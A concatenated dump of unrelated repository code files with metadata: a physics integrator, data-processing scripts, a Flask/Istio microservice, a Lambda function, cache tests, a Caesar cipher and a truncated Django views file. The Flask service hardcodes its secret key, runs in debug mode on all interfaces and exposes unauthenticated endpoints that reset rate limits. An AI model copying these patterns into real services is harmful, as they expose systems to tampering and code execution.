B = B_field(r)\n\n # Forces acting on the center of mass\n Acc_g = np.array([0,0,-var.g])\n Acc_b = (Prams['charge']/Prams['mass']) * np.cross(v, B)\n Acc = np.add(Acc_g, Acc_b)\n\n # Rotation\n B_body = mult_Q(conj_Q(quat), mult_Q(np.array([0.0, B[0], B[1], B[2]]),quat))[1:4]\n torq = Prams['magnetic']*np.array([-B_body[1], B_body[0], 0])\n \n angVel = 2*mult_Q(conj_Q(quat), quat_deriv)[1:4]\n angMom = np.array([Prams['momentx']*angVel[0], Prams['momentx']*angVel[1], Prams['momentz']*angVel[2]])\n angRot = np.cross(angVel, angMom)\n \n tRot = np.subtract(torq, angRot)\n moment_inv = 1./Prams['momentx']\n tRot_Q = np.array([0.0, moment_inv*tRot[0], moment_inv*tRot[1], tRot[2]/Prams['momentz']])\n \n ddQ_1 = mult_Q(quat_deriv, mult_Q(conj_Q(quat),quat_deriv))\n ddQ_2 = 0.5*mult_Q(quat, tRot_Q)\n ddQ = np.add(ddQ_1, ddQ_2)\n \n # Change rates\n deriv = [quat_deriv, ddQ]\n deriv = np.insert(deriv, 0, Acc)\n deriv = np.insert(deriv, 0, v) \n return deriv\n\ndef integrate_impact(t, InCon, Prams):\n \"\"\" Track grain through phase space during its impact with the surface.\n \n Parameters\n ----------\n t : float\n time step used by integrator (defined in SciPy module)\n \n InCon : array\n phase space of grain\n -quaternion = {0:4}\n -quaternion derivative = {4:8}\n \n Prams : dict\n system parameters\n 'momentx' : moment of inertia in x\n 'momentz' : moment of inertia in z\n 'accel' : acceleration on center of mass\n \"\"\"\n \n quat = InCon[0:4]\n quat_norm = np.linalg.norm(quat)\n if (quat_norm > 1.00001) or (quat_norm < 0.99999):\n quat = quat/quat_norm \n quat_deriv = InCon[4:8] \n \n accel_body = mult_Q(conj_Q(quat), mult_Q(Prams['accel'], quat))\n torq = np.array([-accel_body[2], accel_body[1], 0.0])\n \n angVel = 2*mult_Q(conj_Q(quat), quat_deriv)[1:4]\n angMom = np.array([Prams['momentx']*angVel[0], Prams['momentx']*angVel[1], Prams['momentz']*angVel[2]])\n angRot = np.cross(angVel, angMom)\n \n tRot = np.subtract(torq, angRot)\n momentx_inv = 1./Prams['momentx']\n tRot_Q = np.array([0.0, momentx_inv*tRot[0], momentx_inv*tRot[1], tRot[2]/Prams['momentz']])\n \n q1 = mult_Q(quat_deriv, mult_Q(conj_Q(quat),quat_deriv))\n q2 = 0.5*mult_Q(quat, tRot_Q)\n quat_deriv_deriv = np.add(q1, q2)\n \n return np.insert(quat_deriv_deriv, 0, quat_deriv) 
","repo_name":"mige4603/Swirl-Simulation","sub_path":"IDQuat/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72303273474","text":"import numpy as np\nimport imgs,preproc.rescale\n\ndef projection(in_path,out_path):\n proj_x=get_projection(dim=0)\n proj_y=get_projection(dim=1)\n def full_projection(frames):\n x_frames=proj_x(frames)\n y_frames=proj_y(frames)\n return [np.concatenate([proj_x,proj_y],axis=0)\n for proj_x,proj_y in zip(x_frames,y_frames)]\n imgs.transform(in_path,out_path,full_projection,False)\n\t\ndef raw_projection(in_path,out_path,dim=0):\n helper=get_helper(dim)\n imgs.transform(in_path,out_path,helper,False)\n\ndef get_projection(dim=0):\n proj_x=get_helper(dim)\n def smart_proj(frames):\n x_frames=proj_x(frames)\n x_frames=preproc.rescale.smooth_proj(x_frames)\n x_frames=preproc.rescale.scale(x_frames)\n return x_frames\n return smart_proj\n\ndef get_helper(dim=0):\n def proj_helper(frames):\n all_points=[ to_points(frame_i) for frame_i in frames]\n extr=np.array([np.amax(points_i,axis=0) for points_i in all_points])\n extr_glob=np.amax(extr,axis=0)\n max_x,max_y=extr_glob[dim],extr_glob[2]\n new_frames=[]\n for points_i in all_points:\n frame_i=np.zeros((max_x+5,max_y+5))\n for point_ij in points_i:\n x_j,y_j=int(point_ij[dim]),int(point_ij[2])\n frame_i[x_j][y_j]=200.0\n new_frames.append(frame_i)\n return new_frames\n return proj_helper\n\ndef to_points(frame_i):\n points=[]\n for cord_i in np.array(np.nonzero(frame_i)).T:\n x_i,y_i=cord_i[0],cord_i[1]\n points.append([x_i,y_i,frame_i[x_i][y_i] ])\n return np.array(points)","repo_name":"tjacek/res_ensemble","sub_path":"preproc/proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2498435867","text":"# Databricks notebook source\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col, sum, count, when\nfrom pyspark.sql.functions import sum, when, col, count, desc, rank\nfrom pyspark.sql.window import Window \n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\nrace_results = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(f\"file_date = '{v_file_date}'\")\n\n\n# COMMAND ----------\n\nrace_year_list = df_column_to_list(race_results, 'race_year')\n\n# COMMAND ----------\n\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\nconstructors = race_results.groupBy(\"team\", \"race_year\") \\\n .agg(\n sum(col(\"points\")).alias(\"total_points\"),\n count(when(col(\"position\") == 1, True)).alias(\"Wins\")\n )\n\n\n# COMMAND ----------\n\nconstructor_rank_spec = Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\nfinal_df = constructors.withColumn(\"rank\", rank().over(constructor_rank_spec))\n\n\n# COMMAND ----------\n\ndisplay(final_df)\n\n# COMMAND ----------\n\nmerge_condition = \"tgt.team = src.team AND tgt.race_year = 
src.race_year\"\nmerge_delta_data(\n input_df=final_df,\n db_name=\"f1_presentation\",\n table_name=\"constructor_standings\",\n folder_path=presentation_folder_path,\n merge_condition=merge_condition,\n partition_column=\"race_year\",\n )\n\n# COMMAND ----------\n\n","repo_name":"LouisYC123/azure-databricks-f1","sub_path":"workspace/Formula1/transformations/constructor_standings.py","file_name":"constructor_standings.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72476113155","text":"# work\nimport unicodecsv as csv\n# import csv\nimport ujson as json\nimport gzip\nimport sys\nfrom tqdm import tqdm\n\n\ndef validate_to_set(x):\n if x is None:\n return set()\n elif isinstance(x, (tuple, list)):\n return set(x)\n elif isinstance(x, str):\n return set([x])\n return -1\n\n\ndef main(in_path, out_path, delim=',', keep_fields=None, skip_fields=None):\n \"\"\"\n :param str in_path:\n :param str out_path:\n :param str delim:\n :param list|str keep_fields:\n :param list|str skip_fields:\n \"\"\"\n keep_fields = validate_to_set(keep_fields)\n if keep_fields == -1:\n return\n skip_fields = validate_to_set(skip_fields)\n if skip_fields == -1:\n return\n\n fmt = in_path.split('.')[-1]\n if fmt == 'gz':\n open_to_use = gzip.open\n else:\n open_to_use = open\n\n # Read the file once to get a list of all keep fields\n # skip if a set list of keep fields is defined\n line_count = None\n if len(keep_fields) == 0:\n line_count = 0\n for line in tqdm(open_to_use(in_path)):\n keep_fields.update(list(json.loads(line).keys()))\n line_count += 1\n\n keep_fields.difference_update(skip_fields)\n\n # force alphabetization\n keep_list = sorted(keep_fields)\n\n with open(out_path, 'w') as outfile:\n writer = csv.writer(outfile, delimiter=delim)\n writer.writerow(keep_list)\n for line in tqdm(open_to_use(in_path), total=line_count):\n jsn = json.loads(line)\n writer.writerow([jsn[x] if x in jsn else '' for x in keep_list])\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print('Usage: python jsonlines2csv.py ]')\n sys.exit(0)\n main(sys.argv[1], sys.argv[2], skip_fields=['content'])\n\n# python jl_csv_github.py /Users/pz/Desktop/ds558/pythoncode/project/data_cleaning/link_data/link_la.jl csv_la.csv","repo_name":"ZepeiZhao/APT_renting_platform_Knowledge_Graph","sub_path":"data_cleaning/jlTocsv/jl_csv_github.py","file_name":"jl_csv_github.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11598848569","text":"#This code is developed based on the code presented for BookInfo code.\n\nfrom __future__ import print_function\nfrom flask_bootstrap import Bootstrap\nfrom flask import Flask, request, session, render_template, redirect, url_for, abort\nfrom flask import _request_ctx_stack as stack\nfrom jaeger_client import Tracer, ConstSampler\nfrom jaeger_client.reporter import NullReporter\nfrom jaeger_client.codecs import B3Codec\nfrom opentracing.ext import tags\nfrom opentracing.propagation import Format\nfrom opentracing_instrumentation.request_context import get_current_span, span_in_context\nimport simplejson as json\nimport requests\nimport sys\nfrom json2html import *\nimport logging\nimport requests\nimport os\nimport asyncio\nimport random\nimport time\n\n# These two lines enable debugging at httplib level (requests->urllib3->http.client)\n# You will see the REQUEST, including HEADERS and DATA, 
and RESPONSE with HEADERS but without DATA.\n# The only thing missing will be the response.body which is not logged.\ntry:\n import http.client as http_client\nexcept ImportError:\n # Python 2\n import httplib as http_client\nhttp_client.HTTPConnection.debuglevel = 1\n\napp = Flask(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nrequests_log = logging.getLogger(\"requests.packages.urllib3\")\nrequests_log.setLevel(logging.DEBUG)\nrequests_log.propagate = True\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.DEBUG)\n\n# Set the secret key to some random bytes. Keep this really secret!\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\nBootstrap(app)\n\nservicesDomain = \"\" if (os.environ.get(\"SERVICES_DOMAIN\") is None) else \".\" + os.environ.get(\"SERVICES_DOMAIN\")\nfetchHostname = \"newfetch\" if (os.environ.get(\"FETCH_HOSTNAME\") is None) else os.environ.get(\"FETCH_HOSTNAME\")\n\nflood_factor = 0 if (os.environ.get(\"FLOOD_FACTOR\") is None) else int(os.environ.get(\"FLOOD_FACTOR\"))\n\nfetch = {\n \"name\": \"http://{0}{1}:9090\".format(fetchHostname, servicesDomain),\n \"endpoint\": \"newfetch\",\n \"children\": []\n}\n\nsearchpage = {\n \"name\": \"http://{0}{1}:9090\".format(fetchHostname, servicesDomain),\n \"endpoint\": \"newfetch\",\n \"children\": [fetch]\n}\n\nservice_dict = {\n \"newsearchpage\": searchpage,\n \"newfetch\": fetch,\n}\n\ncity_rate_limit = {\n \"counter\" : 0,\n \"stamp\" : time.time(),\n \"threshold\" : 5\n}\n\nbooks_rate_limit = {\n \"counter\" : 0,\n \"stamp\" : time.time(),\n \"threshold\" : 5\n}\n\n\n# A note on distributed tracing:\n#\n# Although Istio proxies are able to automatically send spans, they need some\n# hints to tie together the entire trace. Applications need to propagate the\n# appropriate HTTP headers so that when the proxies send span information, the\n# spans can be correlated correctly into a single trace.\n#\n# To do this, an application needs to collect and propagate headers from the\n# incoming request to any outgoing requests. The choice of headers to propagate\n# is determined by the trace configuration used. See getForwardHeaders for\n# the different header options.\n#\n# This example code uses OpenTracing (http://opentracing.io/) to propagate\n# the 'b3' (zipkin) headers. Using OpenTracing for this is not a requirement.\n# Using OpenTracing allows you to add application-specific tracing later on,\n# but you can just manually forward the headers if you prefer.\n#\n# The OpenTracing example here is very basic. It only forwards headers. It is\n# intended as a reference to help people get started, eg how to create spans,\n# extract/inject context, etc.\n\n# A very basic OpenTracing tracer (with null reporter)\ntracer = Tracer(\n one_span_per_rpc=True,\n service_name='newsearchpage',\n reporter=NullReporter(),\n sampler=ConstSampler(decision=True),\n extra_codecs={Format.HTTP_HEADERS: B3Codec()}\n)\n\ndef trace():\n '''\n Function decorator that creates opentracing span from incoming b3 headers\n '''\n def decorator(f):\n def wrapper(*args, **kwargs):\n request = stack.top.request\n try:\n # Create a new span context, reading in values (traceid,\n # spanid, etc) from the incoming x-b3-*** headers.\n span_ctx = tracer.extract(\n Format.HTTP_HEADERS,\n dict(request.headers)\n )\n # Note: this tag means that the span will *not* be\n # a child span. It will use the incoming traceid and\n # spanid. 
We do this to propagate the headers verbatim.\n rpc_tag = {tags.SPAN_KIND: tags.SPAN_KIND_RPC_SERVER}\n span = tracer.start_span(\n operation_name='op', child_of=span_ctx, tags=rpc_tag\n )\n except Exception as e:\n # We failed to create a context, possibly due to no\n # incoming x-b3-*** headers. Start a fresh span.\n # Note: This is a fallback only, and will create fresh headers,\n # not propagate headers.\n span = tracer.start_span('op')\n with span_in_context(span):\n r = f(*args, **kwargs)\n return r\n wrapper.__name__ = f.__name__\n return wrapper\n return decorator\n\ndef getForwardHeaders(request):\n headers = {}\n\n # x-b3-*** headers can be populated using the opentracing span\n span = get_current_span()\n carrier = {}\n tracer.inject(\n span_context=span.context,\n format=Format.HTTP_HEADERS,\n carrier=carrier)\n\n headers.update(carrier)\n\n # We handle other (non x-b3-***) headers manually\n if 'user' in session:\n headers['end-user'] = session['user']\n\n # Keep this in sync with the headers in details and reviews.\n incoming_headers = [\n # All applications should propagate x-request-id. This header is\n # included in access log statements and is used for consistent trace\n # sampling and log sampling decisions in Istio.\n 'x-request-id',\n\n # Lightstep tracing header. Propagate this if you use lightstep tracing\n # in Istio (see\n # https://istio.io/latest/docs/tasks/observability/distributed-tracing/lightstep/)\n # Note: this should probably be changed to use B3 or W3C TRACE_CONTEXT.\n # Lightstep recommends using B3 or TRACE_CONTEXT and most application\n # libraries from lightstep do not support x-ot-span-context.\n 'x-ot-span-context',\n\n # Datadog tracing header. Propagate these headers if you use Datadog\n # tracing.\n 'x-datadog-trace-id',\n 'x-datadog-parent-id',\n 'x-datadog-sampling-priority',\n\n # W3C Trace Context. Compatible with OpenCensusAgent and Stackdriver Istio\n # configurations.\n 'traceparent',\n 'tracestate',\n\n # Cloud trace context. Compatible with OpenCensusAgent and Stackdriver Istio\n # configurations.\n 'x-cloud-trace-context',\n\n # Grpc binary trace context. Compatible with OpenCensusAgent nad\n # Stackdriver Istio configurations.\n 'grpc-trace-bin',\n\n # b3 trace headers. Compatible with Zipkin, OpenCensusAgent, and\n # Stackdriver Istio configurations. Commented out since they are\n # propagated by the OpenTracing tracer above.\n # 'x-b3-traceid',\n # 'x-b3-spanid',\n # 'x-b3-parentspanid',\n # 'x-b3-sampled',\n # 'x-b3-flags',\n\n # Application-specific headers to forward.\n 'user-agent',\n ]\n # For Zipkin, always propagate b3 headers.\n # For Lightstep, always propagate the x-ot-span-context header.\n # For Datadog, propagate the corresponding datadog headers.\n # For OpenCensusAgent and Stackdriver configurations, you can choose any\n # set of compatible headers to propagate within your application. For\n # example, you can propagate b3 headers or W3C trace context headers with\n # the same result. 
This can also allow you to translate between context\n # propagation mechanisms between different applications.\n\n for ihdr in incoming_headers:\n val = request.headers.get(ihdr)\n if val is not None:\n headers[ihdr] = val\n\n return headers\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.values.get('username')\n response = app.make_response(redirect(request.referrer))\n session['user'] = user\n return response\n\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n response = app.make_response(redirect(request.referrer))\n session.pop('user', None)\n return response\n\n\n# The UI:\n@app.route('/')\n@app.route('/index.html')\ndef index():\n \"\"\" Display productpage with normal user and test user buttons\"\"\"\n global searchpage\n\n table = json2html.convert(json=json.dumps(searchpage),\n table_attributes=\"class=\\\"table table-condensed table-bordered table-hover\\\"\")\n\n return render_template('index.html', serviceTable=table)\n\n\n@app.route('/health')\ndef health():\n return 'Product page is healthy'\n\n@app.route('/api/v1/')\ndef Forough():\n return 'I Love U Forough :*'\n\n@app.route('/books')\n@trace()\ndef front_books():\n\n global books_rate_limit\n\n rate_limit_stamp = time.time()\n\n if (rate_limit_stamp % 1 == 0) or (rate_limit_stamp - books_rate_limit[\"stamp\"] > 1):\n books_rate_limit[\"counter\"] = 0\n books_rate_limit[\"stamp\"] = rate_limit_stamp\n\n if (books_rate_limit[\"counter\"] > books_rate_limit[\"threshold\"]):\n abort(429)\n books_rate_limit[\"counter\"] += 1\n\n product_id = random.randint(1, 800)\n headers = getForwardHeaders(request)\n user = session.get('user', '')\n product = getFetch(product_id)\n fetchStatus, fetch = getFetchedPoints_books(product_id,headers)\n return render_template(\n 'searchpage.html',\n # detailsStatus=detailsStatus,\n fetchStatus=fetchStatus,\n product=product,\n # details=details,\n fetch=fetch,\n user=user)\n\n@app.route('/city')\n@trace()\ndef front_city():\n\n global city_rate_limit\n\n rate_limit_stamp = time.time()\n\n if (rate_limit_stamp % 1 == 0) or (rate_limit_stamp - city_rate_limit[\"stamp\"]>1):\n city_rate_limit[\"counter\"] = 0\n city_rate_limit[\"stamp\"] = rate_limit_stamp\n\n if (city_rate_limit[\"counter\"] > city_rate_limit[\"threshold\"]):\n abort(429)\n city_rate_limit[\"counter\"] += 1\n product_id = random.randint(1000000,10000000)\n headers = getForwardHeaders(request)\n user = session.get('user', '')\n product = getFetch(product_id)\n fetchStatus, fetch = getFetchedPoints_city(product_id,headers)\n return render_template(\n 'searchpage.html',\n fetchStatus=fetchStatus,\n product=product,\n fetch=fetch,\n user=user)\n\n\ndef getFetch(product_id):\n products = getProducts()\n if product_id + 1 > len(products):\n return None\n else:\n return products[product_id]\n\n# The API:\n@app.route('/api/v1/search')\ndef searchapi():\n return json.dumps(getProducts()), 200, {'Content-Type': 'application/json'}\n\n\n@app.route('/api/v1/newfetch/books/')\n@trace()\ndef fetchapi_book(points):\n headers = getForwardHeaders(request)\n status, fetches = getFetchedPoints_books(points, headers)\n return json.dumps(fetches), status, {'Content-Type': 'application/json'}\n\n@app.route('/api/v1/newfetch/city/')\n@trace()\ndef fetchapi_city(points):\n headers = getForwardHeaders(request)\n status, fetches = getFetchedPoints_city(points, headers)\n return json.dumps(fetches), status, {'Content-Type': 'application/json'}\n\n@app.route('/ratecity/')\n@trace()\ndef rate_city(ratelimitc):\n 
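# Updates the city endpoint's rate-limit threshold from the value embedded
# in the URL path and echoes it back as JSON (rate_books below mirrors this
# for the books endpoint).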
city_rate_limit[\"threshold\"] = int(float(ratelimitc))\n statecode = 200\n status = 200\n return json.dumps(ratelimitc), status, {'Content-Type': 'application/json'}\n\n@app.route('/ratebook/')\n@trace()\ndef rate_books(ratelimitb):\n books_rate_limit[\"threshold\"] = int(float(ratelimitb))\n statecode = 200\n status = 200\n return json.dumps(ratelimitb), status, {'Content-Type': 'application/json'}\n\n# Data providers:\ndef getProducts():\n return [\n {\n 'points': 123\n }\n ]\n\ndef getFetchedPoints_books(fetchpoints, headers):\n for _ in range(1):\n try:\n url = fetch['name'] + \"/\" + fetch['endpoint'] + \"/books/\" + str(fetchpoints)\n res = requests.get(url, headers=headers, timeout=20.0)\n except BaseException:\n res = None\n if res and res.status_code == 200:\n return 200, res.json()\n status = res.status_code if res is not None and res.status_code else 500\n return status, {'error': 'Sorry, the information for this book is not available.'}\n\ndef getFetchedPoints_city(fetchpoints, headers):\n\n for _ in range(1):\n try:\n url = fetch['name'] + \"/\" + fetch['endpoint'] + \"/city/\" + str(fetchpoints)\n res = requests.get(url, headers=headers, timeout=20.0)\n except BaseException:\n res = None\n if res and res.status_code == 200:\n return 200, res.json()\n status = res.status_code if res is not None and res.status_code else 500\n return status, {'error': 'Sorry, the information for this city is not available.'}\n\n\nclass Writer(object):\n def __init__(self, filename):\n self.file = open(filename, 'w')\n\n def write(self, data):\n self.file.write(data)\n\n def flush(self):\n self.file.flush()\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2:\n logging.error(\"usage: %s port\" % (sys.argv[0]))\n sys.exit(-1)\n\n p = int(sys.argv[1])\n logging.info(\"start at port %s\" % (p))\n # Python does not work on an IPv6 only host\n # https://bugs.python.org/issue10414\n app.run(host='0.0.0.0', port=p, debug=True, threaded=True)\n","repo_name":"foroughsh/Framework-for-dynamically-meeting-performanc-objectives","sub_path":"Services_on_testbed/front_node/searchpage.py","file_name":"searchpage.py","file_ext":"py","file_size_in_byte":13805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"171400253","text":"import json\nimport sys\nimport datetime\n\ndef help():\n msg = 'epoch-converter help\\n'\n msg += '\\t Muestra la ayuda de la función\\n'\n msg += 'epoch-converter epoch VALUE\\n'\n msg += '\\t Convierte VALUE (epoch timestamp) a formato fecha\\n'\n msg += 'epoch-converter date VALUE\\n'\n msg += '\\t Convierte VALUE (fecha en formato MM/DD/YYYY-HH:MM:SS) a un epoch timestamp\\n'\n return msg, 200\n\ndef epoch2date(value):\n try:\n ts = datetime.datetime.fromtimestamp(int(value))\n return ts.strftime('%m/%d/%Y-%H:%M:%S'), 200\n except:\n return 'The value must be an integer', 400\n\ndef date2epoch(value):\n try:\n date, time = value.split('-')\n month,day,year = [int(i) for i in date.split('/')]\n h,m,s = [int(i) for i in time.split(':')]\n\n ts = int(datetime.datetime(year, month, day, h, m, s).timestamp())\n return f'{ts}', 200\n except ValueError as e:\n return str(e), 400\n \ndef handle_output(res):\n msg, code = res\n return {\n 'statusCode': code,\n 'body': msg\n }\n\n\ndef lambda_handler(event, context):\n\n args = event.split()\n print(args)\n\n if not args:\n return handle_output(('There are no arguments', 400))\n\n if args[0] == 'help':\n return handle_output(help())\n\n if len(args) < 2:\n msg = 'Is ncessary 
provide the format and the value to convert'\n return handle_output((msg, 400))\n \n if args[0] == 'epoch':\n return handle_output(epoch2date(args[1]))\n elif args[0] == 'date':\n return handle_output(date2epoch(args[1]))\n else:\n return handle_output(('Format/operation not supported', 400))\n\n","repo_name":"miavisa/SD","sub_path":"tareas/faas/epoch-converter/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8429057349","text":"\"\"\"\nUnit tests for pypistats cache\n\"\"\"\nimport tempfile\nfrom pathlib import Path\n\nimport respx\nfrom freezegun import freeze_time\n\nimport pypistats\n\n\nclass TestPypiStatsCache:\n def setup_method(self) -> None:\n # Choose a new cache dir that doesn't exist\n self.original_cache_dir = pypistats.CACHE_DIR\n self.temp_dir = tempfile.TemporaryDirectory()\n pypistats.CACHE_DIR = Path(self.temp_dir.name) / \"pypistats\"\n\n def teardown_method(self) -> None:\n # Reset original\n pypistats.CACHE_DIR = self.original_cache_dir\n\n @freeze_time(\"2018-12-26\")\n def test__cache_filename(self) -> None:\n # Arrange\n url = \"https://pypistats.org/api/packages/pip/recent\"\n\n # Act\n out = pypistats._cache_filename(url)\n\n # Assert\n assert str(out).endswith(\n \"2018-12-26-https-pypistats-org-api-packages-pip-recent.json\"\n )\n\n def test__load_cache_not_exist(self) -> None:\n # Arrange\n filename = Path(\"file-does-not-exist\")\n\n # Act\n data = pypistats._load_cache(filename)\n\n # Assert\n assert data == {}\n\n def test__load_cache_bad_data(self) -> None:\n # Arrange\n with tempfile.NamedTemporaryFile(delete=False) as f:\n f.write(b\"Invalid JSON!\")\n\n # Act\n data = pypistats._load_cache(Path(f.name))\n\n # Assert\n assert data == {}\n\n def test_cache_round_trip(self) -> None:\n # Arrange\n filename = pypistats.CACHE_DIR / \"test_cache_round_trip.json\"\n data = \"test data\"\n\n # Act\n pypistats._save_cache(filename, data)\n new_data = pypistats._load_cache(filename)\n\n # Tidy up\n filename.unlink()\n\n # Assert\n assert new_data == data\n\n def test__clear_cache(self) -> None:\n # Arrange\n # Create old cache file\n cache_file = pypistats.CACHE_DIR / \"2018-11-26-old-cache-file.json\"\n pypistats._save_cache(cache_file, data={})\n assert cache_file.exists()\n\n # Act\n pypistats._clear_cache()\n\n # Assert\n assert not cache_file.exists()\n\n @respx.mock\n def test_subcommand_with_cache(self) -> None:\n # Arrange\n package = \"pip\"\n mocked_url = \"https://pypistats.org/api/packages/pip/overall\"\n mocked_response = \"\"\"{\n \"data\": [\n {\"category\": \"without_mirrors\", \"date\": \"2018-11-01\", \"downloads\": 2295765}\n ],\n \"package\": \"pip\",\n \"type\": \"overall_downloads\"\n }\"\"\"\n expected_output = \"\"\"\n| category | downloads |\n|:----------------|----------:|\n| without_mirrors | 2,295,765 |\n\nDate range: 2018-11-01 - 2018-11-01\n\"\"\"\n\n # Act\n respx.get(mocked_url).respond(content=mocked_response)\n # First time to save to cache\n pypistats.overall(package)\n # Second time to read from cache\n output = pypistats.overall(package, format=\"md\")\n\n # Assert\n assert output.strip() == expected_output.strip()\n","repo_name":"hugovk/pypistats","sub_path":"tests/test_pypistats_cache.py","file_name":"test_pypistats_cache.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"61"} 
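The cache tests in the record above pin down a small contract: cache filenames are date-stamped slugs of the request URL, and a missing or unparsable cache file must load as an empty dict. Below is a minimal, self-contained sketch of helpers that satisfy that contract; the function names and cache location are assumptions modeled on the tests, not pypistats' actual internals.

```python
import datetime
import json
import re
from pathlib import Path

CACHE_DIR = Path.home() / ".cache" / "pypistats"  # assumed location

def cache_filename(url: str) -> Path:
    # e.g. 2018-12-26-https-pypistats-org-api-packages-pip-recent.json
    today = datetime.date.today().isoformat()
    slug = re.sub(r"\W+", "-", url).strip("-")
    return CACHE_DIR / f"{today}-{slug}.json"

def save_cache(path: Path, data) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(data))

def load_cache(path: Path):
    # missing or corrupt cache files degrade to an empty dict,
    # matching test__load_cache_not_exist and test__load_cache_bad_data
    try:
        return json.loads(path.read_text())
    except (OSError, ValueError):
        return {}
```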
+{"seq_id":"12194947124","text":"#my_str = \"hello world\"\n#my_str_as_bytes = str.encode(my_str)\n#print(type(my_str_as_bytes) )# ensure it is byte representation\n#my_decoded_str = my_str_as_bytes.decode()\n#type(my_decoded_str) # ensure it is string representation\n#print(my_str_as_bytes)\n\n#print(ord(\"b\"))#ASCII(only character) - ord function\n#print(ord(\"A\"))\n\n# Add each character, and its ordinal, of user's text input, to two lists\n#s = input(\"Enter value: \") # this line requires Python 3.x, use raw_input() instead of input() in Python 2.x\n\n#l1=[c for c in s] # in Python, a string is just a sequence, so we can iterate over it!\n#l2=[ord(c) for c in s]\n\n#print(l1)\n#print(l2)\ndef encrypt(message,shift_key):\n\n result=''\n print('length:', len(message))\n for i in range(len(message)):\n letter=message[i]\n\n if letter.isupper():\n # 65 == ord('A'): rotate within the uppercase alphabet\n result+=chr((ord(letter)+shift_key-65)%26+65)\n else:\n # 97 == ord('a'): rotate within the lowercase alphabet\n result += chr((ord(letter) + shift_key - 97) % 26 + 97)\n return result\n\n\n","repo_name":"savithri3317/Hybrid-encryption","sub_path":"GUI/Encoding.py","file_name":"Encoding.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32611764609","text":"from .models import RiderProfile, Profile, Codes, Merchandise, MerchandiseOrder, ClubEvent, SignupPromotion\nimport json\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.conf import settings\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.core.mail import send_mail, send_mass_mail, EmailMultiAlternatives, EmailMessage\nfrom .models import Event\nfrom django.http import JsonResponse, HttpResponsePermanentRedirect, HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom events.forms import (\n RegistrationForm,\n EditProfileForm,\n RiderProfileFormSet,\n MerchandiseOrderForm,\n RegistrationCheck,\n LobosRace\n)\nfrom django.db.models import F\nfrom django.forms.utils import ErrorDict, ErrorList\nfrom django.template import loader\nfrom django.template import Context\nfrom anymail.message import attach_inline_image_file\nfrom django.template.loader import render_to_string\nimport random\nimport string\nimport re\nimport math\nfrom datetime import datetime as ddt\nimport datetime as dt\n\n\ndef clubeventsCheckout(request):\n return render(request, 'events/clubeventsCheckout.html')\n\n\ndef change_names_to_lower():\n all_names = RiderProfile.objects.all()\n for name in all_names:\n name.first_name = name.first_name.lower()\n name.last_name = name.last_name.lower()\n try:\n name.email = name.email.lower()\n name.email2 = name.email2.lower()\n except:\n print('no email')\n try:\n name.confirmation_number = name.confirmation_number.upper()\n except:\n print('no confirmation number')\n name.save()\n\n\n@staff_member_required\ndef clubevents(request):\n if request.POST:\n form = LobosRace(request.POST)\n if form.is_valid():\n data = {\n 'name': form.cleaned_data['name'],\n 'event': 'Devils Head',\n }\n f = form.save()\n return render(request, 'events/clubeventsCheckout.html', {'data': data})\n else:\n errors = form.errors\n return render(request, 'events/clubevents.html', {'form': form, 'errors': errors})\n else:\n form = LobosRace()\n signed_up = 
